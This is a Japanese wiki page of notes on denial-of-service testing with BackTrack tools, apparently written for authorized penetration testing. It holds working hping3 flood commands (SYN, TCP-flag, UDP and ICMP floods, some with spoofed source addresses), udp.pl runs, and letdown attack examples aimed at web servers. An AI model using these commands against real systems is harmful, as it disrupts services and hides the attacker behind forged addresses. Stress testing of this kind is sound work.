DoS検査Last-modified: 2011-08-05 (金) 11:28:47
DoS検査について、方法をまとめます。 ※(他のページも同様ですが)本ページの内容は無保証です。 ※常に書きかけ項目 ツールの場所 †Applications>BackTrack>Stress Testing>Network Stress Testing ツール一覧 †テキストで列挙。
6って何だろう。IPv6対応? TCP関連 †SYN Flood †まずはhping3での実施方法。 【実際のコマンド】 hping3 -i u1000 -c 4 -S -p 443 xxx.xxx.xxx.xxx 参考情報 †Example of a SYN flood attack using hping3 : hping3 -q -n -a 10.0.0.1 -S -s 53 --keep -p 22 --flood 192.168.0.2 TCP Connection Flood †まずはhping3での実施方法。 説明(引用) †There are lots of possibilities of flooding using TCP. Just set the various TCP flags as you whish. Some TCP flooding techniques consist in setting a lot of unusual flags to perturb week O.S. 参考情報 †Example with the SARFU scan : hping3 -q -n -a 10.0.0.1 -SARFU -p 22 --flood 192.168.0.2 【実際のコマンド】 hping3 -q -n -a 10.0.0.1 -SARFU -p 80 -i u1000 xxx.xxx.xxx.xxx UDP関連 †UDP Flood †まずはhping3での実施方法。 hping3で実施 †It is the same concept as in ICMP flood except that you send a huge amount of UDP data. UDP flood can be very dangerous for the network bandwidth. hping3 -q -n -a 10.0.0.1 --udp -s 53 --keep -p 68 --flood 192.168.0.2 【実際のコマンド】 hping3 -i u1000 -c 4 -2 -p 53 xxx.xxx.xxx.xxx udp.plで実施 †動作することは確認。 【コマンド】 root@bt:/pentest/misc/udp-pl# perl ./udp.pl 192.168.80.132 53 1 【結果】 udp flood - odix udp: no process found 確認はhping3で。 root@bt:/pentest/misc/udp-pl# hping3 -p 53 -c 4 -2 192.168.80.132 HPING 192.168.80.132 (eth2 192.168.80.132): udp mode set, 28 headers + 0 data bytes ICMP関連 †NW機器など、応答しないものについては実施しなくてよい。 ICMP flood †ICMP flooding consists to send a maximum ICMP data to a machine in the minimum amount of time, for example pings. In the "old" times it was possible to corrupt a machine using a single huge ping (the ping of death), hopefully these times are over, but it is still possible to attack the bandwidth and process time of any machine who accept ICMP packets. Example of an ICMP flood using hping 3 : hping3 -q -n -a 10.0.0.1 --id 0 --icmp -d 56 --flood 192.168.0.2 The -q option means quiet, the -n means no name resolving, ?id 0 if for ICMP echo request (ping), -d is size of the packet (56 is the normal size for a ping). その他 †hping3 --flood オプション †「--flood」オプションで、可能な限り早くSYNパケットを送信可能 ※ログが出力されないので、テストの際は代替オプションとして「-i u1000」(1000micro sec間隔で送信)などを使用することが望ましい。 【実際のコマンド】
HTTP †記載予定 参考URL †DoS †http://www.hackingtricks.in/search/label/DoS%20attack iptablesとhping3を使ったDoS検査 SYN Flood †http://mediakey.dk/~cc/hackerguide-syn-flood-attack/ http://www39.atwiki.jp/vippre/pages/13.html http://www.packetlevel.ch/html/hping.html ツール関連 †LetDown利用 各ツールの概説 以降、落書き置き場 †denial6 root@bt:~# denial6 Syntax: denial6 [-r] interface destination test-case-number Performs various denial of service attacks on a target ・denial6 dos-new-ip6 flood_advertise6 flood_router6 hping2 letdown 2) Exaples: Generic attack: # letdown -d 208.xx.xx.xx -s 192.168.1.x -D destination/router_mac -p 21 Attack against a webserver using payload and firewall options: # letdown -d 208.xx.xx.xx -s 192.168.1.x -D destination/router_mac -p 80 -f iptables -P payloads/http.txt Connections from 3 ports < 1024 and with the time option: # letdown -d 208.xx.xx.xx -s 192.168.1.x -D destination/router_mac -p 80 -x 80 -y 100 -t 10000 More info: http://complemento.sourceforge.net/ rsmurf6 Linuxのみ? sendpees6 「a tool by willdamn(ad)gmail.com, which generates a neighbor solicitation requests with a lot of CGAs (crypto stuff ;-) to keep the CPU busy. nice.」 siege smurf6 ひとまず今回は関係なし。 xHydra Timeoutは100ms程度に設定する。 Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
|